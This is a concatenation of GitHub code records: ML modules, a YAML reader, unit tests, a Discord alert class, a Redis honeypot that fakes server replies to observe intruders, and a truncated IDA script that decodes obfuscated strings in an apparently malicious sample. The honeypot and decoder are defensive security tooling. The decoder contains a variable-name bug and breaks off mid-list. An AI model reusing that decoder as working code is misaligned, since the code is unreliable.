num_channels_split, n_flow_step=0, opt=None, num_levels_condition=0, SR=True):\n super().__init__()\n self.SR = SR\n\n # number of levels of RRDB features. One level of conditional feature is enough for image rescaling\n num_features_condition = 2 if self.SR else 1\n\n # feature extraction\n RRDB_nb = opt_get(opt, ['RRDB_nb'], [5, 5])\n RRDB_nf = opt_get(opt, ['RRDB_nf'], 64)\n RRDB_gc = opt_get(opt, ['RRDB_gc'], 32)\n RRDB_f = functools.partial(RRDB, nf=RRDB_nf, gc=RRDB_gc)\n self.conv_first = nn.Conv2d(num_channels_split + RRDB_nf*num_features_condition*num_levels_condition, RRDB_nf, 3, 1, 1, bias=True)\n self.RRDB_trunk0 = mutil.make_layer(RRDB_f, RRDB_nb[0])\n self.RRDB_trunk1 = mutil.make_layer(RRDB_f, RRDB_nb[1])\n self.trunk_conv1 = nn.Conv2d(RRDB_nf, RRDB_nf, 3, 1, 1, bias=True)\n\n # conditional flow\n self.additional_flow_steps = nn.ModuleList()\n for k in range(n_flow_step):\n self.additional_flow_steps.append(FlowStep(in_channels=num_channels-num_channels_split,\n cond_channels=RRDB_nf*num_features_condition,\n flow_permutation=opt['flow_permutation'],\n flow_coupling=opt['flow_coupling'], opt=opt))\n\n self.f = Conv2dZeros(RRDB_nf*num_features_condition, (num_channels-num_channels_split)*2)\n\n\n def forward(self, z, u, eps_std=None, logdet=0., reverse=False, training=True):\n # for image SR\n if self.SR:\n if not reverse:\n conditional_feature = self.get_conditional_feature_SR(u)\n\n for layer in self.additional_flow_steps:\n z, logdet = layer(z, u=conditional_feature, logdet=logdet, reverse=False)\n\n h = self.f(conditional_feature)\n mean, logs = thops.split_feature(h, \"cross\")\n logdet += GaussianDiag.logp(mean, logs, z)\n\n return logdet, conditional_feature\n\n else:\n conditional_feature = self.get_conditional_feature_SR(u)\n\n h = self.f(conditional_feature)\n mean, logs = thops.split_feature(h, \"cross\")\n z = GaussianDiag.sample(mean, logs, eps_std)\n\n for layer in reversed(self.additional_flow_steps):\n z, _ = layer(z, u=conditional_feature, reverse=True)\n\n return z, logdet, conditional_feature\n else:\n # for image rescaling\n if not reverse:\n conditional_feature = self.get_conditional_feature_Rescaling(u)\n\n for layer in self.additional_flow_steps:\n z, logdet = layer(z, u=conditional_feature, logdet=logdet, reverse=False)\n\n h = self.f(conditional_feature)\n mean, scale = thops.split_feature(h, \"cross\")\n logscale = 0.318 * torch.atan(2 * scale)\n z = (z - mean) * torch.exp(-logscale)\n\n return z, conditional_feature\n\n else:\n conditional_feature = self.get_conditional_feature_Rescaling(u)\n\n h = self.f(conditional_feature)\n mean, scale = thops.split_feature(h, \"cross\")\n logscale = 0.318 * torch.atan(2 * scale)\n z = GaussianDiag.sample(mean, logscale, eps_std)\n\n for layer in reversed(self.additional_flow_steps):\n z, _ = layer(z, u=conditional_feature, reverse=True)\n\n return z, conditional_feature\n\n\n def get_conditional_feature_SR(self, u):\n u_feature_first = self.conv_first(u)\n u_feature1 = self.RRDB_trunk0(u_feature_first)\n u_feature2 = self.trunk_conv1(self.RRDB_trunk1(u_feature1)) + u_feature_first\n\n return torch.cat([u_feature1, u_feature2], 1)\n\n def get_conditional_feature_Rescaling(self, u):\n u_feature_first = self.conv_first(u)\n u_feature = self.trunk_conv1(self.RRDB_trunk1(self.RRDB_trunk0(u_feature_first))) + u_feature_first\n\n return u_feature\n\n\n","repo_name":"JingyunLiang/HCFlow","sub_path":"codes/models/modules/ConditionalFlow.py","file_name":"ConditionalFlow.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"34"} +{"seq_id":"35849235361","text":"# coding: utf-8\n\n# This module contains abstractions for the input stream. You don't have to\n# looks further, there are no pretty code.\n#\n# We define two classes here.\n#\n# Mark(source, line, column)\n# It's just a record and its only use is producing nice error messages.\n# Parser does not use it for any other purposes.\n#\n# Reader(source, data)\n# Reader determines the encoding of `data` and converts it to unicode.\n# Reader provides the following methods and attributes:\n# reader.peek(length=1) - return the next `length` characters\n# reader.forward(length=1) - move the current position to `length`\n# characters.\n# reader.index - the number of the current character.\n# reader.line, stream.column - the line and the column of the current\n# character.\n\nimport codecs\n\nfrom pipenv.vendor.ruamel.yaml.error import YAMLError, FileMark, StringMark, YAMLStreamError\nfrom pipenv.vendor.ruamel.yaml.util import RegExp\n\nfrom typing import Any, Dict, Optional, List, Union, Text, Tuple, Optional # NOQA\n# from ruamel.compat import StreamTextType # NOQA\n\n__all__ = ['Reader', 'ReaderError']\n\n\nclass ReaderError(YAMLError):\n def __init__(\n self, name: Any, position: Any, character: Any, encoding: Any, reason: Any,\n ) -> None:\n self.name = name\n self.character = character\n self.position = position\n self.encoding = encoding\n self.reason = reason\n\n def __str__(self) -> Any:\n if isinstance(self.character, bytes):\n return (\n f\"'{self.encoding!s}' codec can't decode byte #x{ord(self.character):02x}: \"\n f'{self.reason!s}\\n'\n f' in \"{self.name!s}\", position {self.position:d}'\n )\n else:\n return (\n f'unacceptable character #x{self.character:04x}: {self.reason!s}\\n'\n f' in \"{self.name!s}\", position {self.position:d}'\n )\n\n\nclass Reader:\n # Reader:\n # - determines the data encoding and converts it to a unicode string,\n # - checks if characters are in allowed range,\n # - adds '\\0' to the end.\n\n # Reader accepts\n # - a `bytes` object,\n # - a `str` object,\n # - a file-like object with its `read` method returning `str`,\n # - a file-like object with its `read` method returning `unicode`.\n\n # Yeah, it's ugly and slow.\n\n def __init__(self, stream: Any, loader: Any = None) -> None:\n self.loader = loader\n if self.loader is not None and getattr(self.loader, '_reader', None) is None:\n self.loader._reader = self\n self.reset_reader()\n self.stream: Any = stream # as .read is called\n\n def reset_reader(self) -> None:\n self.name: Any = None\n self.stream_pointer = 0\n self.eof = True\n self.buffer = \"\"\n self.pointer = 0\n self.raw_buffer: Any = None\n self.raw_decode = None\n self.encoding: Optional[Text] = None\n self.index = 0\n self.line = 0\n self.column = 0\n\n @property\n def stream(self) -> Any:\n try:\n return self._stream\n except AttributeError:\n raise YAMLStreamError('input stream needs to be specified')\n\n @stream.setter\n def stream(self, val: Any) -> None:\n if val is None:\n return\n self._stream = None\n if isinstance(val, str):\n self.name = ''\n self.check_printable(val)\n self.buffer = val + '\\0'\n elif isinstance(val, bytes):\n self.name = ''\n self.raw_buffer = val\n self.determine_encoding()\n else:\n if not hasattr(val, 'read'):\n raise YAMLStreamError('stream argument needs to have a read() method')\n self._stream = val\n self.name = getattr(self.stream, 'name', '')\n self.eof = False\n self.raw_buffer = None\n self.determine_encoding()\n\n def peek(self, index: int = 0) -> Text:\n try:\n return self.buffer[self.pointer + index]\n except IndexError:\n self.update(index + 1)\n return self.buffer[self.pointer + index]\n\n def prefix(self, length: int = 1) -> Any:\n if self.pointer + length >= len(self.buffer):\n self.update(length)\n return self.buffer[self.pointer : self.pointer + length]\n\n def forward_1_1(self, length: int = 1) -> None:\n if self.pointer + length + 1 >= len(self.buffer):\n self.update(length + 1)\n while length != 0:\n ch = self.buffer[self.pointer]\n self.pointer += 1\n self.index += 1\n if ch in '\\n\\x85\\u2028\\u2029' or (\n ch == '\\r' and self.buffer[self.pointer] != '\\n'\n ):\n self.line += 1\n self.column = 0\n elif ch != '\\uFEFF':\n self.column += 1\n length -= 1\n\n def forward(self, length: int = 1) -> None:\n if self.pointer + length + 1 >= len(self.buffer):\n self.update(length + 1)\n while length != 0:\n ch = self.buffer[self.pointer]\n self.pointer += 1\n self.index += 1\n if ch == '\\n' or (ch == '\\r' and self.buffer[self.pointer] != '\\n'):\n self.line += 1\n self.column = 0\n elif ch != '\\uFEFF':\n self.column += 1\n length -= 1\n\n def get_mark(self) -> Any:\n if self.stream is None:\n return StringMark(\n self.name, self.index, self.line, self.column, self.buffer, self.pointer,\n )\n else:\n return FileMark(self.name, self.index, self.line, self.column)\n\n def determine_encoding(self) -> None:\n while not self.eof and (self.raw_buffer is None or len(self.raw_buffer) < 2):\n self.update_raw()\n if isinstance(self.raw_buffer, bytes):\n if self.raw_buffer.startswith(codecs.BOM_UTF16_LE):\n self.raw_decode = codecs.utf_16_le_decode # type: ignore\n self.encoding = 'utf-16-le'\n elif self.raw_buffer.startswith(codecs.BOM_UTF16_BE):\n self.raw_decode = codecs.utf_16_be_decode # type: ignore\n self.encoding = 'utf-16-be'\n else:\n self.raw_decode = codecs.utf_8_decode # type: ignore\n self.encoding = 'utf-8'\n self.update(1)\n\n NON_PRINTABLE = RegExp(\n '[^\\x09\\x0A\\x0D\\x20-\\x7E\\x85' '\\xA0-\\uD7FF' '\\uE000-\\uFFFD' '\\U00010000-\\U0010FFFF' ']' # NOQA\n )\n\n _printable_ascii = ('\\x09\\x0A\\x0D' + \"\".join(map(chr, range(0x20, 0x7F)))).encode('ascii')\n\n @classmethod\n def _get_non_printable_ascii(cls: Text, data: bytes) -> Optional[Tuple[int, Text]]: # type: ignore # NOQA\n ascii_bytes = data.encode('ascii') # type: ignore\n non_printables = ascii_bytes.translate(None, cls._printable_ascii) # type: ignore\n if not non_printables:\n return None\n non_printable = non_printables[:1]\n return ascii_bytes.index(non_printable), non_printable.decode('ascii')\n\n @classmethod\n def _get_non_printable_regex(cls, data: Text) -> Optional[Tuple[int, Text]]:\n match = cls.NON_PRINTABLE.search(data)\n if not bool(match):\n return None\n return match.start(), match.group()\n\n @classmethod\n def _get_non_printable(cls, data: Text) -> Optional[Tuple[int, Text]]:\n try:\n return cls._get_non_printable_ascii(data) # type: ignore\n except UnicodeEncodeError:\n return cls._get_non_printable_regex(data)\n\n def check_printable(self, data: Any) -> None:\n non_printable_match = self._get_non_printable(data)\n if non_printable_match is not None:\n start, character = non_printable_match\n position = self.index + (len(self.buffer) - self.pointer) + start\n raise ReaderError(\n self.name,\n position,\n ord(character),\n 'unicode',\n 'special characters are not allowed',\n )\n\n def update(self, length: int) -> None:\n if self.raw_buffer is None:\n return\n self.buffer = self.buffer[self.pointer :]\n self.pointer = 0\n while len(self.buffer) < length:\n if not self.eof:\n self.update_raw()\n if self.raw_decode is not None:\n try:\n data, converted = self.raw_decode(self.raw_buffer, 'strict', self.eof)\n except UnicodeDecodeError as exc:\n character = self.raw_buffer[exc.start]\n if self.stream is not None:\n position = self.stream_pointer - len(self.raw_buffer) + exc.start\n elif self.stream is not None:\n position = self.stream_pointer - len(self.raw_buffer) + exc.start\n else:\n position = exc.start\n raise ReaderError(self.name, position, character, exc.encoding, exc.reason)\n else:\n data = self.raw_buffer\n converted = len(data)\n self.check_printable(data)\n self.buffer += data\n self.raw_buffer = self.raw_buffer[converted:]\n if self.eof:\n self.buffer += '\\0'\n self.raw_buffer = None\n break\n\n def update_raw(self, size: Optional[int] = None) -> None:\n if size is None:\n size = 4096\n data = self.stream.read(size)\n if self.raw_buffer is None:\n self.raw_buffer = data\n else:\n self.raw_buffer += data\n self.stream_pointer += len(data)\n if not data:\n self.eof = True\n\n\n# try:\n# import psyco\n# psyco.bind(Reader)\n# except ImportError:\n# pass\n","repo_name":"pypa/pipenv","sub_path":"pipenv/vendor/ruamel/yaml/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":9940,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"} +{"seq_id":"32055657355","text":"def sum_nums(nums):\n \"\"\"Given list of numbers, return sum of those numbers.\"\"\" \n\n sum = 0\n for i in nums:\n sum = sum + i\n\n return sum\n\nprint(\"sum_nums returned\", sum_nums([1, 2, 3, 4]))","repo_name":"chadsmith686/python-syntax","sub_path":"sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25336580730","text":"import discord\nimport settings\n\n\nclass NotImplementedError(Exception):\n pass\n\n\nclass Discord(discord.Client):\n async def on_ready(self):\n message = self.create_message(self.provider, self.link)\n if settings.DISCORD_SEND_CHANNEL:\n for guild in self.guilds:\n if guild.id == settings.DISCORD_GUILD_ID:\n self.guild = guild\n for channel in self.guild.text_channels:\n if channel.id == settings.DISCORD_CHANNEL_ID:\n self.channel = channel\n await self.channel.send(message)\n if settings.DISCORD_SEND_DM:\n user = await self.fetch_user(settings.DISCORD_USER)\n await user.send(message)\n\n\nclass Email:\n def alert_email(self, message):\n raise NotImplementedError\n\n\nclass Text:\n def alert_text(self, message):\n raise NotImplementedError\n\n\nclass Alert(Discord, Email, Text):\n def __init__(self, *args, **kwargs):\n self.provider = kwargs.pop(\"provider\")\n self.link = kwargs.pop(\"link\")\n super().__init__()\n\n def create_message(self, provider=None, link=None):\n return f\"Stock available at {provider}, more info here: {link}\"\n\n async def alert(self):\n if settings.SEND_DISCORD:\n await self.start(settings.DISCORD_TOKEN)\n if settings.SEND_EMAIL:\n self.alert_email()\n if settings.SEND_TEXT:\n self.alert_text()\n","repo_name":"JordanRClark/canada-ps5-stock-checker","sub_path":"ps5-stock-checker/alerts/alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"42291949449","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'main'\nurlpatterns = [\n path('', views.index, name='index'),\n path('projects/', views.projects, name='projects'),\n path('crudtober/', views.crudtober, name='crudtober'),\n path('lanyard/', views.lanyard, name='lanyard'),\n path('reserved/', views.reserved, name='reserved')\n]\n","repo_name":"rayun56/rayun.dev-page","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28347965876","text":"import datetime\nimport re\n\n\nclass RespHandler:\n def __init__(self):\n # 用来临时存储数据的字典\n self.k_v_dict = {\n \"admin\": \"12345\"\n }\n\n self.executable_command = {\n \"ping\": (self.ping, True),\n \"get\": (self.get, True),\n \"set\": (self.set, True),\n \"keys\": (self.keys, True),\n \"auth\": (self.auth, True),\n \"del\": (self.delete, True),\n \"exists\": (self.exists, True),\n \"dbsize\": (self.dbsize, True),\n \"config\": (self.config, True)\n\n }\n self.unexecutable_command = [\n \"hget\", \"hset\", \"hdel\", \"hlen\", \"hexists\", \"hkeys\", \"hvals\", \"hgetall\", \"hincrby\", \"hincrbyfloat\",\n \"hstrlen\", \"shutdown\", \"expire\", \"expireat\", \"pexpire\", \"pexpireat\", \"ttl\", \"type\", \"rename\", \"renamenx\",\n \"randomkey\", \"move\", \"dump\", \"restore\", \"migrate\", \"scan\", \"select\", \"flushdb\", \"flushall\", \"mset\", \"mget\",\n \"incr\", \"decr\", \"append\", \"strlen\", \"getset\", \"setrange\", \"getrange\", \"rpush\", \"lpush\", \"linsert\", \"lrange\",\n \"lindex\", \"llen\", \"rpop\", \"lpop\", \"lrem\", \"lset\", \"blpop\",\n\n ]\n self.max_num = 100\n\n # 接受命令解析处理\n def _parser(self, command):\n command_list = command.split(\"\\r\\n\")\n cache = {\n \"cmd\": None,\n \"params\": [],\n }\n\n command_list.pop()\n for index in range(1, len(command_list), 2):\n command = (command_list[index], command_list[index + 1])\n if index == 1:\n cache[\"cmd\"] = command\n else:\n cache[\"params\"].append(command)\n\n return cache\n\n # 返回数据格式化处理\n def _format(self, result, error=False):\n if error:\n result_str = \"-\" + result + \"\\r\\n\"\n else:\n if type(result) == str:\n result_str = \"+\" + result + \"\\r\\n\"\n if type(result) == dict:\n length = len(result)\n result_str = \"*\" + str(length) + \"\\r\\n\"\n for k, v in result.items():\n k_l = len(k)\n result_str += \"$\" + str(k_l) + \"\\r\\n\" + str(k) + \"\\r\\n\"\n if type(result) == int:\n if result == -1:\n result_str = \"$\" + str(result) + \"\\r\\n\"\n else:\n result_str = \":\" + str(result) + \"\\r\\n\"\n\n return result_str\n\n # 命令处理引擎\n def handle_command(self, command):\n cache = self._parser(command)\n cmd = cache.get(\"cmd\")[1].lower()\n # try:\n if cmd in self.executable_command.keys():\n if self.executable_command.get(cmd)[1]:\n result, error = self.executable_command.get(cmd)[0](cache)\n else:\n result, error = self.finall_error()\n\n elif cmd in self.unexecutable_command:\n result, error = self.finall_error()\n else:\n result, error = self.normal_error(cache)\n # except Exception:\n # result, error = self.finall_error()\n\n result = self._format(result, error=error).encode(\"utf8\")\n print(f\"result ==> {result}\")\n return result\n\n # 可执行命令\n def ping(self, cache):\n return \"PONG\", False\n\n def get(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) == 1:\n result = self.k_v_dict.get(params[0][1])\n error = False\n if result is None:\n result = -1\n else:\n result = self._num_error(cmd)\n error = True\n print(f\"get ==> {result}\")\n return result, error\n\n def exists(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) >= 1:\n result = 0\n error = False\n for param in params:\n value = self.k_v_dict.get(param[1])\n if value is not None:\n result += 1\n else:\n result = self._num_error(cmd)\n error = True\n print(f\"exists ==> {result}\")\n return result, error\n\n def dbsize(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) == 0:\n result = len(self.k_v_dict)\n error = False\n else:\n result, error = self._num_error(cmd)\n\n print(f\"dbsize ==> {result}\")\n return result, error\n\n def set(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) < 2:\n result, error = self._num_error(cmd)\n elif len(params) == 2:\n self.k_v_dict[params[0][1]] = params[1][1]\n loss = len(self.k_v_dict) - self.max_num\n if loss > 0:\n c = list(self.k_v_dict.items())\n self.k_v_dict = dict(c[loss:])\n result = \"OK\"\n error = False\n else:\n result = \"ERR syntax error\"\n error = True\n print(f\"set ==> {result}\")\n return result, error\n\n def keys(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) != 1:\n result, error = self._num_error(cmd)\n else:\n res_str = params[0][1]\n if res_str == \"*\":\n res_str = \".*\"\n key_list = self.k_v_dict.keys()\n result = {}\n error = False\n for key in key_list:\n if re.match(res_str, key):\n result[key] = self.k_v_dict.get(key)\n\n print(f\"keys ==> {result}\")\n\n return result, error\n\n def delete(self, cache):\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) < 1:\n result, error = self._num_error(cmd)\n else:\n count = 0\n error = False\n for param in params:\n try:\n del(self.k_v_dict[param[1]])\n count += 1\n except:\n continue\n\n result = count\n\n print(f\"delete ==> {result}\")\n return result, error\n\n def auth(self, cache):\n error = True\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) < 1:\n result, error = self._num_error(cmd)\n elif len(params) == 1:\n result = \"ERR AUTH called without any password configured for the default user. Are you sure your configuration is correct?\"\n error = True\n else:\n result = \"WRONGPASS invalid username-password pair or user is disabled.\"\n\n return result, error\n\n # 重要监控命令config\n def config(self, cache):\n # 做埋点\n error = True\n cmd = cache.get(\"cmd\")\n params = cache.get(\"params\")\n if len(params) < 1:\n result, error = self._num_error(cmd)\n else:\n c = params[0][1].lower()\n if c == \"help\":\n result = \"\"\"1) CONFIG arg arg ... arg. Subcommands are:\n2) GET -- Return parameters matching the glob-like and their values.\n3) SET -- Set parameter to value.\n4) RESETSTAT -- Reset statistics reported by INFO.\n5) REWRITE -- Rewrite the configuration file.\"\"\"\n error = False\n else:\n result = f\"ERR Unknown subcommand or wrong number of arguments for '{params[0][1]}'. Try CONFIG HELP\"\n error = True\n\n return result, error\n\n # 错误信息\n def _num_error(self, cmd):\n error = True\n return f\"ERR wrong number of arguments for '{cmd[1]}' command\", error\n\n def normal_error(self, cache):\n error = True\n args_str = \"\"\n for i in cache.get(\"params\"):\n args_str += i[1] + \", \"\n return f\"ERR unknown command `{cache.get('cmd')[1]}`, with args beginning with: {args_str}\", error\n\n # 针对不可执行命令的报错\n def finall_error(self):\n error = True\n result = \"ERR Protocol error: invalid bulk length\"\n return result, error\n\n\nif __name__ == '__main__':\n a = RespHandler()\n cmd = \"*2\\r\\n$3\\r\\ndel\\r\\n$5\\r\\nadmin\\r\\n\"\n print(a.handle_command(cmd))\n\n","repo_name":"SSRemex/silumation_redis_honeypot","sub_path":"resp.py","file_name":"resp.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21363171062","text":"# pylint: disable=redefined-outer-name\n# pylint: disable=protected-access\n'''test GetExifData'''\n\nimport json\nimport os\n\nimport boto3\nimport jsonschema\nimport exifread\nimport moto\nimport pytest\n\nfrom dataclasses import asdict\n\nfrom common.test.aws import create_lambda_function_context\n\nos.environ['CROSS_ACCOUNT_IAM_ROLE_ARN'] = 'arn:aws:iam::123456789012:role/PhotoOpsAI/CrossAccountAccess'\nimport src.handlers.GetExifData.function as func\n\n\nDATA_DIR = './data'\nEVENT_DIR = os.path.join(DATA_DIR, 'events')\nSCHEMA_DIR = os.path.join(DATA_DIR, 'schemas')\nIMAGE_DIR = os.path.join(DATA_DIR, 'images')\nMODEL_DIR = os.path.join(DATA_DIR, 'models')\n\n### Events\n@pytest.fixture()\ndef context():\n '''context object'''\n return create_lambda_function_context('GetExifData')\n\n@pytest.fixture(params=[\n 'test_image_nikon.NEF',\n 'test_image_lightroom_nikon.jpg',\n 'test_image_lightroom_nikon.dng',\n 'test_image_lightroom_nikon_embedded_raw.dng',\n 'test_image_lightroom_nikon.tif',\n])\ndef image_name(request):\n '''Return an image file object'''\n return request.param\n\n\n@pytest.fixture(params=['GetExifData-event-eb.json'])\ndef event(request, image_name):\n '''Return a test event'''\n with open(os.path.join(EVENT_DIR, request.param)) as f:\n j = json.load(f)\n j['Records'][0]['s3']['object']['key'] = 'images/{}'.format(image_name)\n return j\n\n\n@pytest.fixture()\ndef event_schema():\n '''Return an event schema'''\n with open(os.path.join(SCHEMA_DIR, 's3-notification.schema.json')) as f:\n return json.load(f)\n\n\n@pytest.fixture()\ndef image(image_name):\n '''Return an image file object'''\n return open(os.path.join(IMAGE_DIR, image_name), 'rb')\n\n\n@pytest.fixture()\ndef s3_bucket_name(event):\n '''S3 bucket name'''\n return event['Records'][0]['s3']['bucket']['name']\n\n\n@pytest.fixture()\ndef s3_object_key(event):\n '''S3 bucket name'''\n return event['Records'][0]['s3']['object']['key']\n\n\n@pytest.fixture()\ndef expected_response(image_name):\n '''Return a test event'''\n file_name = 'GetExifData-output-{}.json'.format(image_name)\n with open(os.path.join(EVENT_DIR, file_name)) as f:\n return json.load(f)\n\n\n@pytest.fixture()\ndef response_schema():\n '''Return a response schema'''\n with open(os.path.join(SCHEMA_DIR, 'GetExifDataResponse.schema.json')) as f:\n return json.load(f)\n\n\n@pytest.fixture()\ndef item_schema():\n '''Return an itemschema'''\n with open(os.path.join(SCHEMA_DIR, 'ExifDataItem.schema.json')) as f:\n return json.load(f)\n\n\n@pytest.fixture()\ndef data_schema():\n '''Return a data schema'''\n with open(os.path.join(SCHEMA_DIR, 'ExifData.schema.json')) as f:\n return json.load(f)\n\n\n### AWS clients\n@pytest.fixture()\ndef aws_credentials():\n '''Mock credentials to prevent accidentally escaping our mock'''\n os.environ['AWS_ACCESS_KEY_ID'] = 'testing'\n os.environ['AWS_SECRET_ACCESS_KEY'] = 'testing'\n os.environ['AWS_SECURITY_TOKEN'] = 'testing'\n os.environ['AWS_SESSION_TOKEN'] = 'testing'\n\n\n@moto.mock_sts\n@pytest.fixture()\ndef session(aws_credentials):\n '''AWS Session fixture'''\n return boto3.Session()\n\n\n@moto.mock_s3\n@pytest.fixture()\ndef s3_client(session):\n '''S3 client fixture'''\n return session.client('s3')\n\n\n# Data validation\ndef test_validate_event(event, event_schema):\n '''Test event data against schema'''\n jsonschema.validate(event, event_schema)\n\n\ndef test_validate_expected_response(expected_response, response_schema):\n '''Test response against schema'''\n jsonschema.validate(expected_response, response_schema)\n\n\ndef test_validate_expected_item(expected_response, item_schema):\n '''Test response data against schema'''\n jsonschema.validate(expected_response.get('Item'), item_schema)\n\n\ndef test_validate_expected_data(expected_response, data_schema):\n '''Test response data against schema'''\n jsonschema.validate(expected_response.get('Item', {}).get('exif'), data_schema)\n\n\n### Tests\n@moto.mock_s3\ndef test_handler(event, image, expected_response, s3_client, s3_bucket_name, s3_object_key, context, mocker):\n '''Call handler'''\n mocker.patch(\n 'src.handlers.GetExifData.function._get_cross_account_s3_client',\n return_value=s3_client\n )\n s3_client.create_bucket(Bucket=s3_bucket_name)\n\n # FIXME: How do we handle pictures\n image.seek(0)\n s3_client.upload_fileobj(image, s3_bucket_name, s3_object_key)\n # FIXME: Looks like exifread closes JPGs biut not others. Should figure that out.\n #image.seek(0)\n\n resp = func.handler(event, context)\n assert resp == expected_response\n","repo_name":"ServerlessOpsIO/PhotoOps","sub_path":"tests/unit/src/handlers/GetExifData/test_function.py","file_name":"test_function.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41619796416","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nimport scipy.optimize as opt\nfrom sklearn.metrics import classification_report\nimport Sigmoid as sg\n\n\ndef load_mat(path):\n data = loadmat(path)\n X = data['X']\n y = data['y']\n y = y.flatten()\n\n return X, y\n\n\ndef load_weight():\n weight = loadmat('ex4weights.mat')\n theta1 = weight['Theta1']\n theta2 = weight['Theta2']\n\n return theta1, theta2\n\n\ndef plot_data(X):\n '''随机画100个数字'''\n index = np.random.choice(range(5000),\n 100) # np.random.choice(arrange,size),返回ndarray\n images = X[index] # 随机选择100个样本\n fig, ax_array = plt.subplots(\n 10, 10, sharex=True, sharey=True, figsize=(8, 8)) # ax_array为Axes对象\n for r in range(10):\n for c in range(10):\n ax_array[r, c].matshow(\n images[r * 10 + c].reshape(20, 20), cmap='gray_r'\n ) # matshow() 第一个参数为要显示的矩阵(Display an array as a matrix in a new figure window)\n plt.yticks([])\n plt.xticks([])\n plt.show()\n\n\ndef expand_y(y):\n result = []\n for i in y:\n y_array = np.zeros(10)\n y_array[i - 1] = 1\n result.append(y_array)\n return np.array(result)\n\n\ndef feed_forward(theta1, theta2, X):\n z2 = X @ theta1.T\n a2 = sg.sigmoid(z2) #(5000,25)\n a2 = np.insert(a2, 0, 1, axis=1) #(5000,26)\n z3 = a2 @ theta2.T\n a3 = sg.sigmoid(z3)\n\n return z2, a2, z3, a3\n\n\ndef cost(theta1, theta2, X, y):\n z2, a2, z3, h = feed_forward(theta1, theta2, X)\n # 这里的y是矩阵而不是向量了\n first = -y * np.log(h)\n second = (1 - y) * np.log(1 - h)\n\n return (np.sum(first - second)) / len(X) # 这里不能用np.mean(),否则会相差10倍\n '''\n # or use loop\n for i in range(len(X)):\n first = - y[i] * np.log(h[i])\n second = (1 - y[i]) * np.log(1 - h[i])\n J = J + np.sum(first - second)\n J = J / len(X)\n return J\n '''\n\n\ndef cost_reg(theta1, theta2, X, y, lmd):\n c = cost(theta1, theta2, X, y)\n reg = (lmd / (2 * len(X))) * (\n np.sum(theta1[:, 1:]**2) + np.sum(theta2[:, 1:]**2))\n return reg + c\n\n\ndef main():\n path = 'ex4data1.mat'\n X, y = load_mat(path)\n X = np.insert(X, 0, 1, axis=1)\n y = expand_y(y)\n theta1, theta2 = load_weight()\n print(cost_reg(theta1, theta2, X, y, 1)) #0.38376985909092354\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"scp-1024/Coursera-ML-Ng","sub_path":"Exercise 4-backpropagation/feedForward.py","file_name":"feedForward.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"74620521056","text":"from example import app\nfrom json import loads\n\n\ndef test_google_cloud_function():\n with app.test_client() as client:\n desired_output = [{\"arg0\": \"a\", \"arg1\": \"b\"}]\n resp = client.get(\"/aws/a/b\")\n output = loads(resp.data)\n assert output == desired_output\n","repo_name":"Glitchfix/flask-faas","sub_path":"test/unit/test_aws.py","file_name":"test_aws.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43167708541","text":"#!/usr/bin/env python2.7\n# md5: 68CF2070D8FB4963211CFA4F2DAA72E5\n# filename: 68CF2070D8FB4963211CFA4F2DAA72E5\n# version: 1.0\n\nimport idc\nimport idautils\nimport idaapi\n#from print_hex import list_hex\n\ndef list_hex(int_list):\n \"\"\"print to hex form list, \n eg: [11, 23, 33] to [0xB, 0x17, 0x21]\"\"\"\n hex_list = []\n for x in xrange(len(int_list)):\n hex_str = hex(int_list[x])\n hex_list.append(hex_str)\n return '[%s]' % ', '.join(hex_list)\n\ndef get_data(curr):\n '''get crypted string'''\n data = []\n index = 0\n while True:\n var = idc.Byte(curr+index)\n if not var:\n break\n data.append(var)\n index += 1\n return (data, len(data))\n\ndef old_decode(data, size):\n '''decode data like base64'''\n sub_data = []\n for x in xrange(0, size, 4):\n for i in range(4):\n tmep = data[x+i]\n if temp == 0x3D: ## '='\n break\n sub_data[i] = data[x]\n## chr list ;0123456789abcdefghijklmnopqrstuvwxyzABCDEF(&#^*$!@%)[]{}<>?`:,.\nchr_list = [0x3B, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, \n 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B,\n 0x6C, 0x6D, 0x6E, 0x6F, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76,\n 0x77, 0x78, 0x79, 0x7A, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x28, \n 0x26, 0x23, 0x5E, 0x2A, 0x24, 0x21, 0x40, 0x25, 0x29, 0x5B, 